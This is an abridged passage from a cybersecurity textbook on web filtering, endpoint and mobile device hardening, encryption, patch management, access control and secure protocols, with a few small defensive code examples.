By restricting access to these sites, web filters significantly reduce the risk of
malware infections. Web filtering can also increase employee productivity and limit
legal liability by preventing access to inappropriate or non-work-related content. It
plays a crucial role in data loss prevention (DLP) strategies by blocking certain types
of data transfer or access to sites known for data leakage.
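The filtering criteria described above (URL, content category, and keywords) can be sketched as a simple decision function. The category feed, hostnames, and keyword list here are illustrative, not real reputation data:

```python
# Illustrative policy data, not a real reputation/category feed.
BLOCKED_CATEGORIES = {"malware", "phishing", "gambling"}
SITE_CATEGORIES = {"badsite.example": "malware", "news.example": "news"}
BLOCKED_KEYWORDS = ("free-crypto-giveaway",)

def allow_request(host: str, path: str) -> bool:
    """Apply category- and keyword-based filtering to a web request."""
    if SITE_CATEGORIES.get(host) in BLOCKED_CATEGORIES:
        return False
    if any(keyword in path for keyword in BLOCKED_KEYWORDS):
        return False
    return True
```

Commercial filters work the same way but consult continuously updated category databases rather than a static dictionary.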
Agent-Based Filtering
Agent-based web filtering involves installing a software agent on desktop
computers, laptops, and mobile devices. The agents enforce compliance with
the organization’s web filtering policies. Agents communicate with a centralized
management server to retrieve filtering policies and rules and then apply them
locally on the device. Agent-based solutions typically leverage cloud platforms to
ensure they can communicate with devices regardless of the network they are
connected to. This means filtering policies remain in effect even when users are off
the corporate network, such as when working from home or traveling.
Agent-based filtering can also provide detailed reporting and analytics. The agent
can log web access attempts and return this data to a management server for
analysis, allowing security analysts to monitor Internet usage patterns, identify
attempts to access blocked content, and fine-tune the filtering rules as required.
Because filtering occurs locally on the device, agent-based methods often provide
more granular control, such as filtering HTTPS traffic or applying different filtering
rules for different applications.
• Block Rules—use the proxy server to implement block rules based on various
factors such as the website’s URL, domain, IP address, content category, or
even specific keywords within the web content. For example, an organization
could block all .exe downloads to prevent the accidental download of potentially
harmful files.
Web filter content categories using the IPFire open-source firewall. (Screenshot used
with permission from IPFire.)
Review Activity:
Network Security Capability
Enhancement
monitoring software?
Lesson 9
Summary
• Automate the rollout and management of secure baselines using tools such as
Active Directory Group Policy, Ansible, Puppet, or Chef.
• Use firewalls, IDS/IPS, and web filtering to monitor and control network traffic
and block access to malicious or inappropriate content.
LESSON INTRODUCTION
Endpoint security aims to secure every endpoint connected to a network, from
laptops to smartphones, tablets, and other IoT devices, to prevent them from being
an attack entry point. Effective endpoint security has become increasingly important
as the number and types of devices connected to networks continue to expand.
For traditional computing devices such as desktops and laptops, hardening
practices typically ensure operating systems and all installed applications are
regularly updated, user access is limited, firewalls and antivirus software are
enabled and updated, and unused software, services, and ports are disabled or
removed to minimize potential attack vectors.
Security strategies may include additional considerations for mobile devices such
as smartphones and tablets. While keeping the operating system and applications
updated is still crucial, other practices such as disabling unnecessary features
(like Bluetooth and NFC when not in use), limiting app permissions, and avoiding
unsecured Wi-Fi networks become increasingly important. Installing trusted
security apps, enabling device encryption, and enforcing screen locks are essential
considerations. Mobile device management (MDM) solutions help manage and
control security features across various mobile devices.
Hardening embedded systems and IoT devices focuses on physical security and
firmware integrity, as these systems often control physical processes or are located
in unsecured environments. Applying regular firmware updates, employing secure
boot processes to maintain firmware integrity, and ensuring communications are
encrypted are common practices. Since these systems have limited computational
capabilities, they require lightweight but robust security solutions.
Lesson Objectives
In this lesson, you will do the following:
• Explore the importance of endpoint hardening.
Topic 10A
Implement Endpoint Security
Endpoint Hardening
Operating System Security
Operating system security encompasses many practices that aim to protect
against unauthorized access, data breaches, malware infections, and other
security threats. There are many considerations and requirements when securing
an operating system because operating systems are complicated and powerful
software products that operate at the core of all information systems. Many
security concepts apply to operating system security, including access controls,
authentication mechanisms, secure configurations, application security, secure
coding, patch management, endpoint protection, user awareness training, and
monitoring.
Hardening describes changing an operating system or application to make it
operate securely. The need for hardening must be balanced against functional
requirements and usability because hardening can often negatively impact how
applications work or interoperate.
Best practice baselines play a critical role in device hardening by providing a
standard set of guidelines or checklists for configuring devices securely. These
baselines, often developed by cybersecurity experts or organizations, offer a
starting point for systems administrators to ensure that devices are configured
according to industry security standards. Many of the requirements can be applied
automatically via a configuration baseline template. The essential principle is
least functionality: a system should run only the protocols and services
required by legitimate users, and no more. This reduces the potential attack surface.
• Interfaces provide a connection to the network. Some machines may have more
than one interface. For example, there may be wired and wireless interfaces or
a modem interface. Some machines may come with a management network
interface card. If any of these interfaces are not required, they should be
explicitly disabled rather than simply left unused.
It is also important to establish a maintenance cycle for each device and keep up to
date with new security threats and responses for the particular software products
that you are running.
Workstations
Workstations operate at the frontline of an organization’s activities and present
unique concerns regarding endpoint hardening compared to other devices. Due
to the varied tasks and numerous applications associated with workstation use,
they generally have a large attack surface. Hardening practices to minimize this
attack surface include removing unnecessary software, limiting administrative
privileges, strictly managing application installations and updates, and many
other changes. Furthermore, since employees operate workstations, user-focused
security strategies are essential, including regular training and awareness activities
to educate users about threats such as phishing and promoting secure behaviors
such as strong password practices, responsible Internet use, and careful handling of
sensitive data, among other practices.
Additionally, it is essential to configure workstation settings for increased
security, such as automatic updates, screen locks, firewalls, endpoint protection,
intrusion detection and prevention, increased logging, encryption, monitoring, and
many other protections. Also, the need to secure peripheral devices like USB ports is unique
to workstations. It is often achieved using features of endpoint protection software
and the implementation of strict device control policies. Lastly, given the various
roles and responsibilities assigned to different workstations, segmentation is crucial
to restrict communications and limit the potential for malware or attackers to
propagate across the network.
Using Security Compliance Manager to compare settings in a production GPO with Microsoft’s
template policy settings. (Screenshot used with permission from Microsoft.)
Endpoint Protection
The purpose of device hardening is to enhance a system’s security by minimizing
the potential vulnerabilities a malicious entity could exploit. This is achieved by
configuring network and system settings to reduce their attack surface.
Segmentation
Segmentation is crucial to securing an enterprise environment because it reduces
the potential impact of a cybersecurity incident by isolating systems and limiting
the spread of an attack or malware infection. In a segmented network, systems
are divided into separate segments or subnets, each with distinct security controls
and access permissions. This type of segmentation significantly complicates
an attacker’s work, giving an organization more time to detect and respond.
Furthermore, segmentation allows more granular control over data access to
ensure users, devices, and applications only have access to the information
necessary for their specific tasks, thus enhancing data protection and privacy.
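The subnet boundary that enforces segmentation can be sketched with Python's ipaddress module. The Marketing and Finance prefixes below are illustrative:

```python
import ipaddress

# Illustrative subnet plan for the two departments.
MARKETING = ipaddress.ip_network("10.1.0.0/24")
FINANCE = ipaddress.ip_network("10.2.0.0/24")

def same_segment(host_a: str, host_b: str) -> bool:
    """True if both hosts share a subnet. If not, their traffic must
    cross the router, where access policy can be enforced."""
    a, b = ipaddress.ip_address(host_a), ipaddress.ip_address(host_b)
    return any(a in net and b in net for net in (MARKETING, FINANCE))
```

Traffic between hosts in different segments is forced through the router, which is the choke point where ACLs or a firewall inspect and restrict it.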
A segmented network showing Marketing and Finance subnets and the placement of network
devices. Traffic between the two networks is controlled by the router. (Images © 123RF.com.)
Isolation
Device isolation refers to segregating individual devices within a network to limit
their interaction with other devices and systems. This aims to enhance endpoint
protection by preventing the lateral spread of threats should a device become
compromised. In the context of endpoint protection, device isolation creates
barriers between devices so that a threat that infiltrates one device cannot easily
spread to others. Device isolation restricts network traffic between devices,
reducing the potential attack surface. This approach is particularly useful against
threats like worms or ransomware, which often aim to propagate through networks quickly.
Device isolation also limits breach impacts by ensuring that compromised devices
cannot access the entire network.
Disk Encryption
Full disk encryption (FDE) means that the entire contents of the drive (or volume),
including system files and folders, are encrypted. OS ACL-based security measures
are quite simple to circumvent if an adversary can attach the drive to a different
host OS. Drive encryption allays this security concern by making the contents of
the drive accessible only in combination with the correct encryption key. Disk
encryption can be applied to both hard disk drives (HDDs) and solid state drives
(SSDs).
FDE requires the secure storage of the key used to encrypt the drive contents.
Normally, this is stored in a Trusted Platform Module (TPM). The TPM chip has a
secure storage area to which a disk encryption program, such as Windows BitLocker,
can write its keys. It is also possible to use a removable USB drive (if USB is a boot
device option). As part of the setup process, you create a recovery password or key.
This can be used if the disk is moved to another computer or the TPM is damaged.
Activating BitLocker drive encryption. (Screenshot used with permission from Microsoft.)
One of the drawbacks of FDE is that, because the OS performs the cryptographic
operations, performance is reduced. This issue is mitigated by self-encrypting
drives (SED), where the cryptographic operations are performed by the drive
controller. The SED uses a symmetric data/media encryption key (DEK/MEK) for bulk
encryption and stores the DEK securely by encrypting it with an asymmetric key pair
called either the authentication key (AK) or Key Encryption Key (KEK). The use of
the AK is authenticated by the user password. This means that the user password
can be changed without having to decrypt and re-encrypt the drive. Early types of
SEDs used proprietary mechanisms, but many vendors now develop to the Opal
Storage Specification (nvmexpress.org/wp-content/uploads/TCGandNVMe_Joint_
White_Paper-TCG_Storage_Opal_and_NVMe_FINAL.pdf), developed by the Trusted
Computing Group (TCG).
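The key-wrapping principle described above can be sketched in a few lines. This is a toy illustration only (XOR with a password-derived key stands in for the proper key-wrap algorithm a real SED performs): changing the password only re-wraps the DEK, so the bulk data on the drive never has to be re-encrypted.

```python
import hashlib
import os
import secrets

def derive_kek(password: str, salt: bytes) -> bytes:
    # Derive a 32-byte key-encryption key (KEK) from the user password.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def wrap(dek: bytes, kek: bytes) -> bytes:
    # Toy XOR "wrap"; a real SED uses a standardized key-wrap construction.
    return bytes(a ^ b for a, b in zip(dek, kek))

salt = os.urandom(16)
dek = secrets.token_bytes(32)      # generated once, used for all bulk encryption
wrapped = wrap(dek, derive_kek("old-password", salt))

# Password change: unwrap with the old KEK, re-wrap with the new one.
recovered = wrap(wrapped, derive_kek("old-password", salt))
assert recovered == dek            # same DEK, so the drive contents are untouched
rewrapped = wrap(recovered, derive_kek("new-password", salt))
```

Because only the small wrapped-key blob changes, a password change completes instantly even on a multi-terabyte drive.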
Device—Description

Laptops, Desktops, Mobile Devices, and Servers—Full disk encryption ensures that
sensitive data is protected even if the storage device is removed from the device or
accessed directly using other methods. For virtual machines, FDE prevents direct
access to data stored in the virtual machine’s disk file.

IoT Devices—Internet of things (IoT) devices, such as smart home devices,
wearables, and industrial sensors, often collect and transmit sensitive data. Full
disk encryption prevents unauthorized access to this data if the devices are
compromised.

External Hard Drives, USB Flash Drives, and External Media—Portable storage
devices are prone to loss or theft. Full disk encryption ensures that the data stored
on these devices remains protected, making it significantly harder for unauthorized
individuals to access or retrieve the information.
Patch Management
No operating system, software application, or firmware implementation is free from
vulnerabilities. As soon as a vulnerability is identified, vendors will try to correct it.
At the same time, attackers will try to exploit it. Automated vulnerability scanners
can be effective at discovering missing patches for the operating system plus a
wide range of third-party software apps and devices/firmware. Scanning is only
useful if effective procedures are in place to apply the missing patches.
In residential and small networks, hosts are typically configured to auto-update,
meaning that they check for and install patches automatically. The major OS and
applications software products are well supported in terms of vendor-supplied fixes
for security issues. In Windows, this process is handled by Windows Update, while in
Linux it can be configured via yum-cron or apt unattended-upgrades,
depending on the package manager used by the distribution.
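On Debian/Ubuntu hosts, for example, unattended upgrades are typically switched on with a short apt configuration fragment like the following (a sketch; the file name and values vary by release):

```shell
# /etc/apt/apt.conf.d/20auto-upgrades (Debian/Ubuntu)
APT::Periodic::Update-Package-Lists "1";   # refresh package lists daily
APT::Periodic::Unattended-Upgrade "1";     # install pending security updates
```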
Enterprise networks need to be cautious about this sort of automated deployment,
however, as a patch incompatible with an application or workflow can cause
availability issues. In rare cases, such as the infamous SolarWinds hack (npr.
org/2021/04/16/985439655/a-worst-nightmare-cyberattack-the-untold-story-of-
the-solarwinds-hack?t=1631031433646), update repositories can be infected with
malware that can then be spread via automated updates.
There can also be performance and management issues when multiple applications
run update clients on the same host. For example, as well as the OS updater, there
is likely also a security software update, browser updater, Java updater, OEM driver
updater, and so on. These issues can be mitigated by deploying an enterprise patch
management suite. Some suites, such as Microsoft’s System Center Configuration
Manager (SCCM)/Endpoint Manager (docs.microsoft.com/en-us/mem/configmgr),
are vendor specific while others are designed to support third-party applications
and multiple OSes.
Testing patches before deploying them into the production environment is crucial
for maintaining the stability and security of software. By conducting thorough
testing, organizations can identify potential issues or conflicts arising from the
patch, ensuring that it does not introduce new vulnerabilities or disrupt critical
operations. Testing helps mitigate the risk of unintended consequences and
facilitates a more controlled deployment process, ultimately safeguarding the
integrity and reliability of the environment. Testing is typically performed in testing
environments built to mirror the production environment as much as appropriate.
It can also be difficult to schedule patch operations, especially if applying
the patch is an availability risk to a critical system. If vulnerability assessments
continually highlight issues with missing patches, patch management procedures
should be upgraded. If the problem affects certain hosts only, it could indicate a
compromise that should be investigated more closely.
Patch management can be difficult for legacy systems, proprietary systems, and
systems from vendors without robust security management plans, such as some
types of Internet of Things devices. These systems will need compensating controls
or some other form of risk mitigation if patches are not readily available.
The term “EDR” was coined by Gartner security researcher Anton Chuvakin, and
Gartner produces annual “Magic Quadrant” reports for both EPP (gartner.com/en/
documents/3848470) and EDR functionality within security suites (https://www.
gartner.com/en/documents/3894086).
Where earlier endpoint protection suites report to an on-premises management
server, next-generation endpoint agents are more likely to be managed from a
cloud portal and use artificial intelligence (AI) and machine learning to perform user
and entity behavior analysis. These analysis resources would be part of the security
service provider’s offering.
Note that managed detection and response (MDR) is a class of hosted security service
(digitalguardian.com/blog/what-managed-detection-and-response-definition-benefits-
how-choose-vendor-and-more).
EDR focuses on protecting endpoint devices like computers, laptops, and mobile
devices by collecting and analyzing data from endpoints to detect, investigate,
and respond to advanced threats that may bypass traditional security measures.
EDR tools provide real-time monitoring and collection of endpoint data, allowing
for fast response and investigation capabilities. EDR software is an important tool
which detects and responds to advanced persistent threats and ransomware, and it
provides valuable forensic insight after a breach. Extended detection and response
(XDR) expands on EDR by providing broader visibility and response capabilities,
extending protection beyond endpoints to incorporate data from the network,
cloud platforms, email gateway, firewall, and other essential infrastructure
components. With this broader scope, XDR provides a comprehensive view of
information technology resources to more effectively identify threats and enable
faster responses.
Endpoint Configuration
If endpoint security is breached, there are several classes of vector to consider for
mitigation:
• Social Engineering—if the malware was executed by a user, use security
education and awareness to reduce the risk of future attacks succeeding. Review
permissions to see if the account could be operated with a lower privilege level.
• Lack of Security Controls—if the attack could have been prevented by endpoint
protection/A-V, host firewall, content filtering, DLP, or MDM, investigate the
possibility of deploying them to the endpoint. If this is not practical, isolate the
system from being exploited by the same vector.
Access Control
Access control refers to regulating and managing the permissions granted to
individuals, software, systems, and networks to access resources or information.
Access controls ensure that only authorized entities can perform specific actions or
access certain data, while unauthorized entities are denied access. Access control
concepts apply to networks, physical access, data, applications, and the cloud.
While ACLs offer flexibility and control, managing complex access control policies
with numerous ACL entries can become challenging. Complexity increases the
risk of misconfigurations. Therefore, proper planning, periodic reviews, and best
practice configurations are essential when implementing and maintaining ACLs.
Configuring an access control entry for a folder. (Screenshot used with permission from Microsoft.)
• Read (r)—the ability to access and view the contents of a file or list the contents
of a directory.
• Write (w)—the ability to save changes to a file, or create, rename, and delete
files in a directory (also requires execute).
• Execute (x)—the ability to run a script, program, or other software file, or the
ability to access a directory, execute a file from that directory, or perform a task
on that directory, such as file search.
These permissions can be applied in the context of the owner user (u), a group
account (g), and all other users/world (o). A permission string lists the permissions
granted in each of these contexts:
d rwx r-x r-x home
The string above shows that for the directory (d), the owner has read, write, and
execute permissions, while the group context and other users have read and
execute permissions.
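The same permission string can be produced programmatically; a minimal sketch using Python's standard-library `stat` module (the directory and mode here are illustrative):

```python
import os
import stat
import tempfile

def perm_string(path: str) -> str:
    # Build the type+rwx string shown in the first column of `ls -l`.
    return stat.filemode(os.stat(path).st_mode)

with tempfile.TemporaryDirectory() as d:
    os.chmod(d, 0o755)        # owner rwx, group r-x, others r-x
    print(perm_string(d))     # drwxr-xr-x
```

The leading `d` marks a directory, followed by the three rwx triplets for owner, group, and other.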
• A block list (or deny list) generally allows execution, but explicitly prohibits listed
processes.
The contents of allow lists and block lists need to be updated in response to
incidents and ongoing threat hunting and monitoring.
Threat hunting may also provoke a strategic change. For example, if you rely
principally on explicit denies, but your systems are subject to numerous intrusions,
you will have to consider adopting a “least privileges” model and using a deny-
unless-listed approach. This sort of change can be highly disruptive, however, so it
must be preceded by a risk assessment and business impact analysis.
Execution control can also be tricky to configure effectively, with many
opportunities for threat actors to evade the controls. Detailed analysis of the attack
might show the need for changes to the existing mechanism or the use of a more
robust system.
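A hash-based allow list, one common execution control mechanism, can be sketched in a few lines. This is a simplified illustration (the file names are hypothetical, and real products also match on publisher signatures, paths, and other attributes):

```python
import hashlib
import os
import tempfile
from pathlib import Path

def sha256_of(path: str) -> str:
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def is_execution_allowed(path: str, allow_list: set) -> bool:
    # Deny-unless-listed: only binaries whose hash appears on the allow list run.
    return sha256_of(path) in allow_list

# Demo with two stand-in "binaries."
with tempfile.TemporaryDirectory() as d:
    approved = os.path.join(d, "approved.exe")
    unknown = os.path.join(d, "unknown.exe")
    Path(approved).write_bytes(b"approved tool")
    Path(unknown).write_bytes(b"unknown tool")
    allow_list = {sha256_of(approved)}
    print(is_execution_allowed(approved, allow_list))  # True
    print(is_execution_allowed(unknown, allow_list))   # False
```

Note the maintenance burden this implies: every legitimate software update changes the hash, so the allow list must be refreshed as part of patch management.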
Monitoring
Monitoring plays a vital role in endpoint hardening, helping to enforce and maintain
the security measures put in place during the hardening process. Once devices are
hardened, monitoring helps to ensure these conditions remain in place.
Security analysts can detect changes that weaken the hardened configuration
through continuous monitoring. For instance, if a previously disabled port is
detected as open or a service that was disabled is changed to enabled, monitoring
tools can alert analysts of the change—which may be indicative of a breach.
Additionally, monitoring can provide valuable data for compliance and auditing
purposes. Regular reports on the status of endpoint devices can verify that
hardening baselines have been effectively deployed and maintained, supporting
compliance with various regulations and industry standards.
Configuration Enforcement
Configuration enforcement describes methods used to ensure that systems
and devices within an organization’s network adhere to mandatory security
configurations. Configuration enforcement generally depends upon a few important
capabilities.
• Standardized Configuration Baselines are defined by organizations like NIST,
CIS, or the organization itself and used as the benchmark for how systems and
devices should be configured.
Group Policy
Group Policy is a feature of the Microsoft Windows operating system and provides
centralized management and configuration of operating systems, applications, and
user settings in an Active Directory environment. Group Policies enforce security
settings, such as those mandated in a baseline, by applying consistent settings
across all systems linked to specific Group Policies. In general terms, Group Policies
are linked to containers called Organizational Units (OUs) that normally contain
user and computer objects. The Group Policies linked to the OU apply to all objects
contained within it.
Examples of common Group Policy settings include password policies, user rights,
Windows Firewall settings, system update settings, software installation restrictions,
and many others. Applying settings centrally using Group Policy reduces potential
issues related to misconfigurations or inconsistent settings.
SELinux
SELinux is a security feature of the Linux kernel that supports access control
security policies, including mandatory access controls (MAC). SELinux allows
more granular permission control over every process and system object within
an operating system, strictly limiting the resources a process can access and what
operations it can perform. SELinux operates on the principle that if a process
or user does not need resource access to operate, it will be blocked to isolate
applications better, restrict system and file access, and prevent malicious or flawed
programs from causing harm to the system. SELinux capabilities are also available
on the Android operating system https://source.android.com/docs/security/
features/selinux. Due to the significant architectural differences between Linux
and Android, SELinux capability on Android is enabled using SEAndroid to provide
similar functionality but using a separately maintained codebase.
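On a Linux host, the current SELinux mode can be read directly from the selinuxfs interface (the path below assumes the standard mount point; the `getenforce` command reports the same information). A minimal sketch:

```python
from pathlib import Path

def selinux_mode() -> str:
    # /sys/fs/selinux/enforce holds "1" (enforcing) or "0" (permissive)
    # when SELinux is compiled into and enabled on the running kernel.
    enforce = Path("/sys/fs/selinux/enforce")
    if not enforce.exists():
        return "disabled or not available"
    return "enforcing" if enforce.read_text().strip() == "1" else "permissive"

print(selinux_mode())
```

Monitoring tools can poll this value to alert when a hardened host silently drops from enforcing to permissive mode.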
Hardening Techniques
Different hardening approaches are required to protect endpoints in response to
a wide variety of constantly evolving cybersecurity threats. These threats require a
layered and comprehensive defense strategy addressing vulnerabilities at multiple
levels, from physical access to network protocols, operating system configurations,
and user behaviors.
Protecting Ports
Physical device port hardening involves restricting the physical interfaces on a
device that can be used to connect to it, thereby reducing potential avenues of
physical attack. One common technique is disabling unnecessary physical ports
such as USB, HDMI, or serial ports when they serve no business purpose. Doing so
can help prevent unauthorized data transfer, installation of malicious software, or
direct access to a system.
Port control software provides additional protection by allowing only authorized
devices to connect via physical ports based on device identifiers. For instance, it
might block all USB mass storage devices except company-approved ones.
Security analysts can leverage settings in device firmware or UEFI/BIOS for port
hardening to disable physical ports or to require a password before a device can
boot from a nonstandard source like a USB drive. For devices such as tablets and
laptops that depend upon wireless protocols, disabling the automatic network
connection feature can prevent the device from using potentially insecure or rogue
networks.
As revealed by researcher Karsten Nohl in his BadUSB paper (https://assets.
website-files.com/6098eeb4f4b0288367fbb639/62bc77c194c4e0fe8fc5e4b5_
SRLabs-BadUSB-BlackHat-v1.pdf), exploiting the firmware of external storage
devices, such as USB flash drives and even standard-looking device charging cables,
presents adversaries with an incredible toolkit. The firmware can be reprogrammed
to make the device look like another device class, such as a keyboard. In this case, it
could then be used to inject a series of keystrokes upon an attachment or work as
a keylogger. The device could also be programmed to act like a network device and
corrupt name resolution, redirecting the user to malicious websites.
Another example is the O.MG cable (theverge.com/2019/8/15/20807854/apple-
mac-lightning-cable-hack-mike-grover-mg-omg-cables-defcon-cybersecurity), which
packs enough processing capability into an ordinary-looking USB-Lightning cable to
run an access point and keylogger.
A modified device may have visual clues that distinguish it from a mass
manufactured thumb drive or cable, but these may be difficult to spot. You should
warn users of the risks and repeat the advice to never attach devices of unknown
provenance to their computers and smartphones. If you suspect a device of being
an attack vector, attach it to a sandboxed lab system (sometimes referred to as a
sheep dip) and observe the system closely. Look for command prompt windows or
processes, such as the command interpreter starting, and for changes to the registry
or other system files.
Not all attacks have to be so esoteric. USB sticks infected with ordinary malware are
still incredibly prolific infection vectors. Hosts should always be configured to prevent
autorun when USB devices are attached. USB ports can be blocked altogether using
most types of host intrusion detection systems (HIDS).
Encryption Techniques
Endpoint encryption is critical to protecting sensitive data, especially in an
enterprise setting. Several different approaches are required to protect data on
endpoints. Some important ones include the following:
• Full Disk Encryption (FDE) encrypts the entire hard drive of a device. It ensures
that all data, including the operating system and user files, are protected even
while the operating system is not running. Tools like BitLocker for Windows and
FileVault for macOS provide full disk encryption capabilities.
• Removable Media Encryption ensures that data remains protected even when
physically removed from devices such as SD cards or USB mass storage devices.
Many FDE tools also include options for encrypting removable media.
Regular firmware updates from the manufacturer are crucial to patching any known
vulnerabilities in older firmware versions, fortifying the printer’s security. If possible,
utilize encrypted network protocols like HTTPS for web interfaces and SNMPv3 for
device management to prevent data, including passwords, from being exposed by
unencrypted protocols. Access to the printer should be based on the principle of least privilege,
granting only the access necessary for specific tasks.
Decommissioning
Decommissioning processes play a vital role in supporting security within an
organization. When a device is no longer needed, it often contains residual data,
potentially sensitive information, and system configurations that could be exploited.
A thorough and systematic decommissioning process ensures that all data is
securely erased or overwritten to reduce the risk of exposure. Decommissioning
also involves resetting devices to their factory settings and eliminating any
residual settings. Updating inventory records during decommissioning is also
important to maintain an accurate account of active assets and support compliance
requirements that mandate accurate asset tracking and secure disposal.
Decommissioning hardware securely is essential as these devices often store sensitive
data on internal drives and retain potentially exploitable configuration and user data.
Data sanitization is a critically important step in the decommissioning process and
describes how all data on the device or removable media is securely erased to
ensure no recoverable data remains.
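For a single file on magnetic media, overwrite-based sanitization can be sketched as follows. This is a simplified illustration only: wear-leveling on SSD/flash media means overwrites do not reliably destroy data there, so built-in secure-erase or crypto-erase commands, or physical destruction, are used instead.

```python
import os
import secrets

def overwrite_and_delete(path: str, passes: int = 1) -> None:
    # Overwrite the file's contents in place with random data, then remove it.
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            f.write(secrets.token_bytes(size))
            f.flush()
            os.fsync(f.fileno())   # push the overwrite through OS caches
    os.remove(path)
```

Even on magnetic media, whole-drive sanitization tools work at the device level rather than per file, since filesystem metadata and slack space can retain fragments.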
Additionally, the device should be reset to its factory settings via a management
console or other utility, eliminating any residual system configurations or settings
that could pose a security risk. Disposing of physical equipment often warrants the
physical destruction of some internal components like memory modules, hard disk
drives (HDD), solid state disks (SSD), M.2, or other storage modules, especially if
they have stored sensitive data. In some scenarios, a professional disposal service
specializing in certified secure disposal of electronic components may be the most
appropriate choice.
The final step in the decommissioning process involves documentation and
updating inventory records to reflect that the device has been decommissioned.
This step ensures an accurate asset record and compliance with security standards
and regulations.
Hardening ICS/SCADA
For ICS/SCADA systems, hardening involves strict network segmentation to isolate
these systems from the wider network and robust authentication and authorization
processes to limit system access strictly. ICS/SCADA is often used to control physical
operations.
Ensuring protection from cyber and physical threats is even more crucial because
breaches can result in environmental disasters, power/gas/water utility failure,
and loss of life. A unique control often used to protect ICS/SCADA is unidirectional
gateways (or data diodes), which ensure that data only flows outward from these
systems, protecting them from inbound attacks.
More information regarding the Common Criteria can be obtained from https://www.
commoncriteriaportal.org.
Review Activity:
Endpoint Security
3. Why are OS-enforced file access controls not sufficient in the event of the loss
or theft of a computer or its disk?
Topic 10B
Mobile Device Hardening
Deployment Models
Mobile device deployment models are critical in defining how an organization uses,
manages, and secures devices. The chosen deployment model impacts everything
from the user experience to the organization’s level of control over the device.
• Bring your own device (BYOD)—means the mobile device is owned by the
employee. The device must comply with established requirements developed
by the organization (such as OS version and device capabilities), and the
employee must agree to having corporate apps installed and acknowledge the
organization’s right to perform audit and compliance checks within the limits
of legal and regulatory rules. This model is popular with employees but poses
significant risk for security operations.
• Corporate owned, personally enabled (COPE)—means the device is owned by
the organization and issued to the employee, who is permitted to use it for
personal as well as business tasks.
• Choose your own device (CYOD)—is similar to COPE except the employee is
given a choice of devices to select from a preestablished list.
Models such as Bring Your Own Device (BYOD), Choose Your Own Device (CYOD),
and Corporate Owned, Personally Enabled (COPE) provide varying degrees of
control and flexibility to both the organization and the employee. For example,
BYOD can offer equipment cost savings to the organization and flexibility for
employees, but it also introduces security challenges caused by mixing personal
and professional data. In contrast, COPE gives the organization greater control
over the device, thereby improving security, but it requires more spending on
equipment.
Selecting the appropriate mobile device deployment model is vital to effectively
balance productivity, user satisfaction, cost efficiency, and security in the workplace.
• Email data and any apps using the “Data Protection” option are subject to a
second round of encryption using a key derived from and protected by the user’s
credential. This provides security for data in the event that the device is stolen.
Not all user data is encrypted using the “Data Protection” option; contacts, SMS
messages, and pictures are not, for example.
Location Services
Geolocation is the use of network attributes to identify (or estimate) the physical
position of a device. The device uses location services to determine its current
position. Location services can make use of two systems:
• Global Positioning System (GPS)—a means of determining the device’s latitude
and longitude based on information received from satellites via a GPS sensor.
Location services are available to any app to which the user has granted
permission to use them.
Restricting device permissions such as camera and screen capture using Intune.
(Screenshot used with permission from Microsoft.)
GPS Tagging
GPS tagging is the process of adding geographical identification metadata, such
as the latitude and longitude where the device was located at the time, to media
such as photographs, SMS messages, video, and so on. It allows the app to place
the media at specific latitude and longitude coordinates. GPS tag data is highly
sensitive personal information and potentially confidential organizational data.
GPS tagged pictures uploaded to social media could be used to track a person’s
movements and location. For example, a Russian soldier revealed troop positions
by uploading GPS tagged selfies to Instagram (arstechnica.com/tech-policy/2014/08/
opposite-of-opsec-russian-soldier-posts-selfies-from-inside-ukraine).
Locking down Android connectivity methods with Intune—note that most settings can be applied
only to Samsung KNOX-capable devices. (Screenshot used with permission from Microsoft.)
Pairing a computer with a smartphone. (Screenshot used with permission from Microsoft.)
It is also the case that using a control center toggle may not actually turn off the
Bluetooth radio on a mobile device. If there is any doubt about patch status or
exposure to vulnerabilities, Bluetooth should be fully disabled through device
settings.
Feature—Description

Pairing and Authentication—During pairing, devices exchange cryptographic keys
to authenticate each other’s identity and establish a secure communication
channel. Pairing is accomplished using various methods, such as numeric
comparison, passkey entry, or out-of-band (OOB) authentication.

Bluetooth Permissions—Bluetooth generally requires user consent or permission
to connect and access specific services. Users can control which devices connect
to their Bluetooth-enabled devices and manage permissions to prevent
unauthorized access.

Encryption—Bluetooth employs encryption algorithms to protect data transmitted
between devices. Once pairing is complete, Bluetooth devices use a shared secret
key to encrypt data packets.

Bluetooth Secure Connections (BSC)—Introduced in Bluetooth 4.0, BSC offers
increased resistance against eavesdropping, on-path attacks, and unauthorized
access.

Bluetooth Low Energy (BLE) Privacy—BLE is a power-efficient version of Bluetooth
that uses randomly generated device addresses that periodically change to prevent
tracking and unauthorized identification of BLE devices.
Skimming a credit or bank card will give the attacker the long card number and
expiration date. Completing fraudulent transactions directly via NFC is much more
difficult as the attacker would have to use a valid merchant account and fraudulent
transactions related to that account would be detected very quickly.
Review Activity:
Mobile Device Hardening
Lesson 10
Summary
You should be able to apply host hardening policies and technologies and to assess
risks from third-party supply chains and embedded/IoT systems.
• Create a management plan for any IoT devices used in the workplace.
LESSON INTRODUCTION
Secure protocol and application development concepts are essential pillars of
robust cybersecurity. Protocols such as HTTPS, SMTPS, and SFTP provide encrypted
communication channels, ensuring data confidentiality and integrity during
transmission. Similarly, email security protocols like SPF, DKIM, and DMARC work
to authenticate sender identities and safeguard against phishing and spam. Secure
coding practices encompass input validation to thwart attacks like SQL injection or
XSS, enforcing the principle of least privilege to minimize exposure during a breach,
implementing secure session management, and consistently updating and patching
software components. Developers must also design software that generates
structured, secure logs to support effective monitoring and alerting capabilities.
Lesson Objectives
In this lesson, you will do the following:
• Understand secure protocol concepts.
Topic 11A
Application Protocol Security Baselines
Secure Protocols
Many of the protocols used on computer networks today were developed many
decades ago when functionality was paramount, trustworthiness was assumed
instead of earned, and network security was less of an issue than it is today. Many
early-era protocols have secure alternatives or can be configured to incorporate
security features, whereas others must simply be avoided.
Insecure protocols, such as HTTP and Telnet, transmit data in clear text format,
meaning anyone accessing the data packets can read any intercepted data sent over
a network. In contrast, secure protocols, like HTTPS and SSH (as alternatives to HTTP
and TELNET), use encryption to protect transmitted data and improve security.
Using HTTPS is crucial for protecting sensitive user information, such as login
credentials and data entered into form fields, from being stolen when using
webpages. System and network engineers must use SSH instead of Telnet when
connecting to servers and equipment to ensure their login information, data, and
commands are encrypted.
Unfortunately, secure protocols are typically more complex to implement,
manage, and maintain when compared to their insecure counterparts and so
